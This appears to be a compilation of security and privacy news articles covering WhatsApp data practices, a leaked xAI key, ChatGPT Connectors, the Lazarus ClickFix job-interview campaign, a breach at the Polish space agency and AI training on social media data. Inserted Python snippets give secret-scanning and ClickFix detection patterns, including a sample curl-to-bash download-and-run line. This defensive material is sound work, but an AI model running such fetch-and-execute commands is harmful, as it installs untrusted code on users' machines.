
User Privacy: Is WhatsApp Not Safe to Use?


WhatsApp allegedly collects data

Recent attacks on WhatsApp allege that the mega-messenger from Meta is collecting user data to generate ad revenue. WhatsApp strongly denies the fresh accusations, but it didn't help that one of its own messages appeared to imply the same.

The allegations 

The recent attacks have two prominent origins. Few critics are as high-profile as Elon Musk, particularly when the criticism lands on X, the platform he owns. Musk asserted on the Joe Rogan Experience that "WhatsApp knows enough about what you're texting to know what ads to show you," adding, "That is a serious security flaw."

These so-called "hooks for advertising" are typically thought to rely on metadata, which includes information on who messages whom, when, and how frequently, as well as other information from other sources that is included in a user's profile.  

End-to-end encryption 

The message content itself is shielded by end-to-end encryption, which is the default setting for all 3 billion WhatsApp users. Signal's open-source encryption protocol, which the Meta platform adopted and modified for its own use, is the foundation of WhatsApp's security. So, in light of these new attacks, do you suddenly need to stop using WhatsApp?

In reality, WhatsApp's content is completely encrypted. There has never been any proof that Meta, WhatsApp, or anybody else can read the content itself. However, the platform you are utilizing is controlled by Meta, and it is aware of your identity. It does gather information on how you use the platform.  

How user data is used 

It also shares information with Meta so that Meta can "show relevant offers/ads." Signal, which has a small fraction of WhatsApp's user base, does not gather metadata in the same manner. Consider using Signal instead for sensitive content. Steer clear of Telegram, which is not end-to-end encrypted by default, and RCS, which is not yet cross-platform encrypted.

Remember that end-to-end encryption only safeguards your data while it is in transit. It does nothing for the security of your content on the device itself: anyone who controls your iPhone or Android can read all of your messages, end-to-end encrypted or not.

Meta's Platforms Rank Worst in Social Media Privacy Rankings: Report

Meta’s Instagram, WhatsApp, and Facebook have once again been flagged as the most privacy-violating social media apps. According to Incogni’s Social Media Privacy Ranking report 2025, Meta and TikTok sit at the bottom of the list. Elon Musk’s X (formerly Twitter) also received poor rankings in various categories, though it performed better than Meta in a few of them.

Discord, Pinterest, and Quora perform well

The report analyzed 15 of the most widely used social media platforms globally, measuring them against 14 privacy criteria organized into six different categories: AI data use, user control, ease of access, regulatory transgressions, transparency, and data collection. The research methodology focused on how an average user could understand and control privacy policies.

Discord, Pinterest, and Quora performed best in the 2025 ranking. Discord placed first, thanks to its stance against handing over user data for AI model training. Pinterest ranked second on the strength of its user controls and fewer regulatory penalties. Quora came third thanks to its limited collection of user data.

Why were Meta platforms penalized?

The Meta platforms, by contrast, were penalized heavily across several categories. Facebook was penalized for frequent regulatory fines, such as those under Europe's GDPR, along with penalties in the US and other regions. Instagram and WhatsApp received heavy penalties for policies that allow the collection of sensitive personal data, such as sexual orientation and health information.

Penalties against X

X was penalized for vast data collection and past privacy fines, but it still ranked above Meta and TikTok in some categories. X was among the easiest platforms to delete an account from, and it provided information to government organizations at a lower rate than other platforms. However, X allows user data to be used to train AI models, which dragged down its overall privacy score.

“One of the core principles motivating Incogni’s research here is the idea that consent to have personal information gathered and processed has to be properly informed to be valid and meaningful. It’s research like this that arms users with not only the facts but also the tools to inform their choices,” Incogni said in its blog. 

Sensitive AI Key Leak: A Wave of Security Concerns in U.S. Government Circles

 




A concerning security mistake involving a U.S. government employee has raised alarms over how powerful artificial intelligence tools are being handled. A developer working for the federal Department of Government Efficiency (DOGE) reportedly made a critical error by accidentally sharing a private access key connected to xAI, an artificial intelligence company linked to Elon Musk.

The leak was first reported after a programming script uploaded to GitHub, a public code-sharing platform, was found to contain login credentials tied to xAI's systems. These credentials reportedly unlocked access to at least 52 of the company's internal AI models, including Grok-4, one of xAI's most advanced tools, similar in capability to OpenAI's GPT-4.

The employee, identified in reports as 25-year-old Marko Elez, had top-level access to various government platforms and databases. These include systems used by sensitive departments such as Homeland Security, the Justice Department, and the Social Security Administration.

The key remained active and publicly visible for a period of time before being taken down. This has sparked concerns that others may have accessed or copied the credentials while they were exposed.
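Leaks like this are typically caught by automated secret scanning before code is ever pushed. As a purely illustrative sketch (the regex and sample strings below are my own assumptions, not details from the incident; production scanners such as gitleaks use far richer rule sets), a minimal check might look like:

```python
import re

# Rough heuristic for hardcoded credentials: a key-like variable name
# assigned a long opaque string. Real scanners apply hundreds of rules.
SECRET_PATTERN = re.compile(
    r"(?i)(api[_-]?key|secret|token)\s*[=:]\s*['\"][A-Za-z0-9_\-]{20,}['\"]"
)

def find_suspect_lines(text):
    """Return (line_number, stripped_line) pairs that look like hardcoded secrets."""
    return [
        (lineno, line.strip())
        for lineno, line in enumerate(text.splitlines(), start=1)
        if SECRET_PATTERN.search(line)
    ]
```

Run against a diff before each commit, a check of this shape would have flagged the credential-bearing script; hooks like this are commonly wired into pre-commit or CI.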


Why It Matters

Security experts say this isn't just a one-off mistake; it's a sign that powerful AI systems may be handled too carelessly, even by insiders with government clearance. If the leaked key had been misused before removal, bad actors could have gained access to internal tools or extracted confidential data.

Adding to the concern, xAI has not yet issued a public response, and there’s no confirmation that the key has been fully disabled.

The leak also brings attention to DOGE’s track record. The agency, reportedly established to improve government tech systems, has seen past incidents involving poor internal cybersecurity practices. Elez himself has been previously linked to issues around unprofessional behavior online and mishandling of sensitive information.

Cybersecurity professionals say this breach is another reminder of the risks tied to mixing government projects with fast-moving private AI ventures. Philippe Caturegli, a cybersecurity expert, said the leak raises deeper questions about how sensitive data is managed behind closed doors.


What Comes Next

While no immediate harm to the public has been reported, the situation highlights the need for stricter rules around how digital credentials are stored, especially when dealing with cutting-edge AI technologies.

Experts are calling for better oversight, stronger internal protocols, and more accountability when it comes to government use of private AI tools.

For now, this case serves as a cautionary tale: even one small error, like uploading a file without double-checking its contents, can open up major vulnerabilities in systems meant to be secure.

OpenAI Rolls Out Premium Data Connections for ChatGPT Users


ChatGPT has become a transformative artificial intelligence tool, widely adopted by individuals and businesses alike to improve their operations. Developed by OpenAI, the platform has proven effective at drafting compelling emails, developing creative content, and conducting complex data analysis, streamlining a wide range of workflows.

OpenAI continuously enhances ChatGPT with new integrations and advanced features that make it easier to fold into an organisation's daily workflows; however, understanding the platform's pricing models is vital for any organisation that wants to use it efficiently. A business or entrepreneur in the United Kingdom weighing ChatGPT's subscription options may find international payments an additional challenge, especially when exchange rates fluctuate or conversion fees are hidden.

In this context, the Wise Business multi-currency card offers a practical way to maintain both financial control and cost transparency. The tool lets companies hold and spend in more than 40 currencies, so they can settle subscription payments without excessive currency conversion charges, making it easier to manage budgets while adopting cutting-edge technology.

OpenAI has recently introduced a suite of premium features aimed at enhancing the ChatGPT experience for subscribers. Paid users now have access to advanced reasoning models, including o1 and o3, which support more sophisticated analysis and problem-solving.

The subscription includes more than enhanced reasoning: an upgraded voice mode makes conversational interactions more natural, and improved memory lets the AI retain context over long periods. A powerful coding assistant has also been added to help developers automate workflows and speed up software development.

To expand the creative possibilities further, OpenAI has raised token limits, allowing larger amounts of input and output text, and users can generate more images without interruption. Subscribers also get expedited image generation via a priority queue, for faster turnaround during high-demand periods.

Paid accounts also retain full access to the latest models with consistent performance: they are not switched to less capable models when server capacity is strained, a limitation free users may still encounter. While OpenAI has put considerable effort into enriching the paid tier, free users have not been left out. GPT-4o has replaced the older GPT-4 model, giving complimentary accounts more capable technology without a downgrade.

Free users also receive basic image-generation tools, although paid subscribers retain priority in generation queues. Reflecting its commitment to making AI broadly accessible, OpenAI has made additional features such as ChatGPT Search, integrated shopping assistance, and limited memory available free of charge.

ChatGPT's free version remains a compelling option for people who use the software only sporadically, perhaps to write the occasional email, do occasional research, or create simple images. Individuals or organisations that frequently run into usage limits, such as long waits for token resets, may find upgrading to a paid plan well worth it, as it unlocks uninterrupted access and advanced capabilities.

To make ChatGPT a more versatile and deeply integrated virtual assistant, OpenAI has introduced a new feature called Connectors. It lets ChatGPT interface seamlessly with a variety of external applications and data sources, so the AI can retrieve and synthesise information from them in real time while responding to user queries.

With Connectors, the company moves toward a more personal and contextually relevant experience for its users. Ahead of a family vacation, for example, users can instruct ChatGPT to scan their Gmail accounts and compile all correspondence about the trip, streamlining travel planning rather than combing through emails manually.

This level of integration brings ChatGPT closer to rivals such as Google's Gemini, which benefits from Google's ownership of popular services like Gmail and Calendar. With Connectors, individuals and businesses can redefine how they engage with AI tools. By giving ChatGPT secure access to personal or organisational data residing across multiple services, OpenAI intends to create a comprehensive digital assistant that anticipates needs, surfaces critical insights, and streamlines decision-making.

There is an increased demand for highly customised and intelligent assistance, which is why other AI developers are likely to pursue similar integrations to remain competitive. The strategy behind Connectors is ultimately to position ChatGPT as a central hub for productivity — an artificial intelligence that is capable of understanding, organising, and acting upon every aspect of a user’s digital life. 

For all its convenience and efficiency, this approach also underlines the need to keep personal information protected, with robust data security and transparency, as these powerful integrations go mainstream. On its official X (formerly Twitter) account, OpenAI recently announced Connectors for Google Drive, Dropbox, SharePoint, and Box, available in ChatGPT outside the Deep Research environment.

With this expansion, users can link their cloud storage accounts directly to ChatGPT, allowing the AI to retrieve and process their personal and professional data when generating responses. OpenAI describes the functionality as "perfect for adding your own context to your ChatGPT during your daily work," highlighting its ambition to make ChatGPT more intelligent and contextually aware.

It is important to note, however, that these newly released Connectors are gated by subscription tier and geography. Access is currently exclusive to ChatGPT Pro subscribers, who pay $200 per month, and is available worldwide except in the European Economic Area (EEA), Switzerland, and the United Kingdom. Users on lower tiers, such as ChatGPT Plus subscribers paying $20 per month, and users in those European regions cannot use these integrations at this time.

The staggered rollout of new features typically reflects broader regulatory compliance challenges in the EU, where stricter data protection rules and AI governance frameworks often delay availability. Outside the Deep Research environment, the range of available Connectors remains relatively limited; within Deep Research, integration support is considerably more extensive.

Within Deep Research, ChatGPT Plus and Pro users can access a much broader array of integrations, for example Outlook, Teams, Gmail, Google Drive, and Linear, though some regional restrictions apply. Organisations on Team, Enterprise, or Educational plans gain additional Deep Research integrations, including SharePoint, Dropbox, and Box.

OpenAI is also offering the Model Context Protocol (MCP), a framework that lets workspace administrators build customised Connectors to suit their needs. By integrating ChatGPT with proprietary data systems, organisations can create secure, tailored integrations, enabling specialised use cases for internal workflows and knowledge management.

As companies adopt artificial intelligence more widely, the catalogue of Connectors is expected to expand rapidly, giving users more options for incorporating external data sources into their conversations. The dynamics of this market underscore the advantage held by technology giants like Google, whose AI assistants, such as Gemini, integrate seamlessly across all of their services, including the search engine.

OpenAI's strategy, by contrast, relies on building a network of third-party integrations to create a similar assistant experience. The new Connectors are now generally accessible in the ChatGPT interface, though users may need to refresh their browsers or update the app to activate them.

The continued growth and refinement of these integrations will likely play a central role in defining the future of AI-powered productivity tools. Organisations and professionals evaluating ChatGPT should take a strategic approach as generative AI capabilities mature, weighing the advantages of deeper integration against operational needs, budget limitations, and the regulatory considerations likely to affect their decisions.

The introduction of Connectors and the advanced subscription tiers puts users on a clear trajectory toward more personalised, dynamic AI assistance that can ingest and contextualise diverse data sources. This evolution also makes it increasingly important to establish strong data governance frameworks, clear access controls, and adherence to privacy regulations.

Companies that invest early in these capabilities will be better positioned to harness AI's potential while setting clear policies that balance innovation with accountability. Looking ahead, the organisations that actively develop internal expertise, test carefully selected integrations, and cultivate a culture of responsible AI use will be best prepared to realise the full potential of artificial intelligence and maintain a competitive edge for years to come.

Lazarus Gang Targets Job Seekers to Install Malware


North Korean hackers behind Contagious Interview are trapping job seekers in the cryptocurrency sector using the popular ClickFix social-engineering tactic. The attackers aim to deploy a previously undocumented Go-based backdoor, known as GolangGhost, on Windows and macOS systems.

Hackers lure job seekers

The latest attack, potentially part of a larger campaign, goes by the codename ClickFake Interview, according to French cybersecurity company Sekoia. Also known as DeceptiveDevelopment, DEV#POPPER, and Famous Chollima, Contagious Interview has been active since December 2022, though it was publicly reported only in late 2023.

The attack uses legitimate-looking job interview sites to push the ClickFix tactic and deploy Windows and macOS backdoors, said Sekoia researchers Amaury G., Coline Chavane, and Felix Aimé, who attributed the activity to the notorious Lazarus Group.

Lazarus involved

One major highlight of the campaign is its focus on centralized finance businesses, mimicking firms like Kraken, Circle, BlockFi, Coinbase, KuCoin, Robinhood, Tether, and Bybit. Traditionally, Lazarus targeted decentralized finance (DeFi) entities.

Attack tactic explained

Like Operation Dream Job, Contagious Interview uses fake job offers to lure potential victims and trick them into downloading malware that steals sensitive data and cryptocurrency. Victims are approached via LinkedIn or X to schedule a video interview and asked to download malware-laced video-conferencing software that triggers the infection process.

Discovery of the Lazarus ClickFix attack

Security researcher Taylor Monahan first reported the Lazarus Group's use of ClickFix, noting attack chains that led to the installation of a malware strain called FERRET, which delivered the Golang backdoor. In this campaign, victims are prompted to join a video interview on a site called 'Willow' and complete a self-recorded video assessment.

The whole process is carefully built to win users' trust and “proceeds smoothly until the user is asked to enable their camera,” Sekoia said. At that point, an “error message appears, indicating that the user needs to download a driver to fix the issue. This is where the operator employs the ClickFix technique," Sekoia adds.

Different attack tactics for Windows and MacOS users

The prompts shown to victims vary by operating system. On Windows, victims are asked to open the Command Prompt and run a curl command that downloads a Visual Basic Script (VBS) file, which in turn launches a batch script to run GolangGhost. On macOS, victims are prompted to open the Terminal app and run a curl command that executes a malicious shell script; that script runs another shell script, which deploys a stealer module called FROSTYFERRET (aka ChromeUpdateAlert) and then the backdoor.
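Both chains share one tell: a pasted one-liner that downloads remote code and immediately executes it. As a hedged, defensive illustration (the heuristics below are my own, not Sekoia's detection logic, and real endpoint protection relies on far richer behavioural signals), flagging that shape is straightforward:

```python
import re

# Heuristics for the download-and-run shape used in ClickFix-style lures.
RISKY_PATTERNS = [
    re.compile(r"curl\s[^|;]*\|\s*(sh|bash|zsh)\b"),      # curl ... | sh   (macOS/Linux)
    re.compile(r"curl\s[^&;]*&&[^;]*\.(vbs|bat|cmd)\b"),  # curl ... && x.vbs  (Windows)
]

def looks_like_clickfix(command: str) -> bool:
    """Return True if a pasted command matches a risky download-and-execute pattern."""
    return any(p.search(command) for p in RISKY_PATTERNS)
```

A command such as `curl https://example[.]com/driver.sh | bash` trips the first pattern; even so, training users never to paste commands from error dialogs remains the better defense.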

Polish Space Agency "POLSA" Suffers Breach; System Offline


Systems offline to control breach

The Polish Space Agency (POLSA) confirmed on X that it suffered a cyberattack last week. The agency disclosed little beyond the fact that it “immediately disconnected” its network after discovering the systems had been hacked, a step the social media post indicates was taken to protect data.

US News said “Warsaw has repeatedly accused Moscow of attempting to destabilise Poland because of its role in supplying military aid to its neighbour Ukraine, allegations Russia has dismissed.” POLSA has remained offline ever since to contain the breach of its IT infrastructure.

Incident reported to authorities

After discovering the attack, POLSA reported the breach to the relevant authorities and opened an investigation to assess its impact. Regarding the incident, POLSA said “relevant services and institutions have been informed.”

POLSA didn’t reveal the nature of the security attack and has not attributed the breach to any attacker. "In order to secure data after the hack, the POLSA network was immediately disconnected from the Internet. We will keep you updated."

How did the attack happen?

While no further information has been released since Sunday, internal sources told The Register that the “attack appears to be related to an internal email compromise” and that staff “are being told to use phones for communication instead.”

POLSA is currently working with the Polish Military Computer Security Incident Response Team (CSIRT MON) and the Polish Computer Security Incident Response Team (CSIRT NASK) to patch affected services. 

Who is responsible?

Commenting on the incident, Poland's Minister of Digital Affairs, Krzysztof Gawkowski, said the “systems under attack were secured. CSIRT NASK, together with CSIRT MON, supports POLSA in activities aimed at restoring the operational functioning of the Agency.” On finding the source, he said, “Intensive operational activities are also underway to identify who is behind the cyberattack. We will publish further information on this matter on an ongoing basis.”

About POLSA

A European Space Agency (ESA) member, POLSA was established in September 2014. It aims to support the Polish space industry and strengthen Polish defense capabilities via satellite systems. The agency also helps Polish entrepreneurs obtain ESA funding and works with the EU, other ESA members, and other countries on various space exploration projects.

Social Media Content Fueling AI: How Platforms Are Using Your Data for Training

 

OpenAI has admitted that developing ChatGPT would not have been feasible without the use of copyrighted content to train its algorithms. It is widely known that artificial intelligence (AI) systems heavily rely on social media content for their development. In fact, AI has become an essential tool for many social media platforms.

For instance, LinkedIn is now using its users’ resumes to fine-tune its AI models, while Snapchat has indicated that if users engage with certain AI features, their content might appear in advertisements. Despite this, many users remain unaware that their social media posts and photos are being used to train AI systems.

Social Media: A Prime Resource for AI Training

AI companies aim to make their models as natural and conversational as possible, with social media serving as an ideal training ground. The content generated by users on these platforms offers an extensive and varied source of human interaction. Social media posts reflect everyday speech and provide up-to-date information on global events, which is vital for producing reliable AI systems.

However, it's important to recognize that AI companies are utilizing user-generated content for free. Your vacation pictures, birthday selfies, and personal posts are being exploited for profit. While users can opt out of certain services, the process varies across platforms, and there is no assurance that your content will be fully protected, as third parties may still have access to it.

How Social Platforms Are Using Your Data

Recently, the United States Federal Trade Commission (FTC) revealed that social media platforms are not effectively regulating how they use user data. Major platforms have been found to use personal data for AI training purposes without proper oversight.

For example, LinkedIn has stated that user content can be utilized by the platform or its partners, though they aim to redact or remove personal details from AI training data sets. Users can opt out by navigating to their "Settings and Privacy" under the "Data Privacy" section. However, opting out won’t affect data already collected.

Similarly, the platform formerly known as Twitter, now X, has been using user posts to train its chatbot, Grok. Elon Musk’s social media company has confirmed that its AI startup, xAI, leverages content from X users and their interactions with Grok to enhance the chatbot’s ability to deliver “accurate, relevant, and engaging” responses. The goal is to give the bot a more human-like sense of humor and wit.

To opt out of this, users need to visit the "Data Sharing and Personalization" tab in the "Privacy and Safety" settings. Under the “Grok” section, they can uncheck the box that permits the platform to use their data for AI purposes.

Regardless of the platform, users need to stay vigilant about how their online content may be repurposed by AI companies for training. Always review your privacy settings to ensure you’re informed and protected from unintended data usage by AI technologies.

X Confronts EU Legal Action Over Alleged AI Privacy Missteps

 


X, Elon Musk's social media company, has reportedly been accused of unlawfully feeding its users' personal information to its artificial intelligence systems without their consent. The complaint was filed by Noyb, a privacy campaign group based in Vienna.

In early September, Ireland's Data Protection Commission (DPC) brought legal proceedings against X over the data collection practices used to train its artificial intelligence systems. A series of privacy complaints against X, the company formerly known as Twitter, followed revelations that the platform had used data from European users to train the chatbot for its Grok AI product without their consent.

A social media user discovered late last month that X had quietly begun processing European users' posts for AI training purposes. TechCrunch reported that the Irish Data Protection Commission (DPC), responsible for ensuring X complies with the General Data Protection Regulation (GDPR), expressed "surprise" at the revelation. X has since announced that all users can choose whether Grok, the platform's AI chatbot, may access their public posts.

Users who wish to opt out must uncheck a box in their privacy settings. Still, Judge Leonie Reynolds observed that X appeared to have begun processing its EU users' data to train its AI systems on May 7, while only offering the opt-out from July 16. She added that not all users had access to the feature when it was first introduced.

NOYB, a persistent privacy activist group and long-standing thorn in Big Tech's side, has filed several complaints against X on behalf of consumers. Its head, Max Schrems, is the privacy activist who successfully challenged Meta's transfers of EU data to the US as violating the EU's stringent GDPR. That case left Meta with a €1.2 billion fine along with logistical challenges, and in June, complaints from NOYB forced Meta to pause the use of EU users' data to train its AI systems.

NOYB also argues that X did not obtain European Union users' consent before using their data to train Grok. A NOYB spokesperson told The Daily Upside that the company could face a fine of up to 4% of its annual revenue over these complaints. Such punitive measures would hit especially hard, as X has far less money to play with than Meta:

It should be noted that X is no longer a publicly traded company, so it is difficult to gauge the state of its cash reserves. What is known is that Musk took the company private in 2022, loading it with roughly $25 billion in debt at a very high leverage ratio. The banks that financed the transaction have since had an increasingly difficult time unloading their shares of that debt, and Fidelity recently marked down its stake, giving a hint at how the firm might be valued.

As of last March, Fidelity's stake was valued 67% below what it was worth at the time of the acquisition. Even before Musk bought Twitter, the company had struggled for years to remain consistently profitable, a small fish in a big-tech pond.

A key goal of NOYB is a full-scale investigation into how X trained its generative artificial intelligence model, Grok, without any consultation with its users. Companies that interact directly with end users only need to show them a yes/no prompt before using their data, Schrems told The Information; they already do this regularly for many other purposes, so it would be entirely possible for AI training as well.

The legal action comes only days before Grok 2 is scheduled to launch in beta. In recent years, major tech companies have faced mounting ethical challenges over training on large amounts of user data. In June 2024, it was widely reported that NOYB had filed complaints against Meta in 11 European countries over new privacy policies signalling the company's intent to use each account's data to train machine learning algorithms.

Cases like this are precisely what the GDPR is meant to protect European citizens from: unexpected uses of their data that could infringe on their right to privacy. Noyb contends that X's reliance on "legitimate interest" as the legal basis for its data collection and use may not be valid, citing a ruling by Europe's top court last summer that held user consent is mandatory in comparable cases involving data used to target ads.

The report outlines further concerns that providers of generative AI systems frequently claim they are unable to comply with other key GDPR requirements, such as the right to be forgotten or the right to access personal data that has been collected. OpenAI's ChatGPT has drawn wide criticism over many of the same GDPR concerns.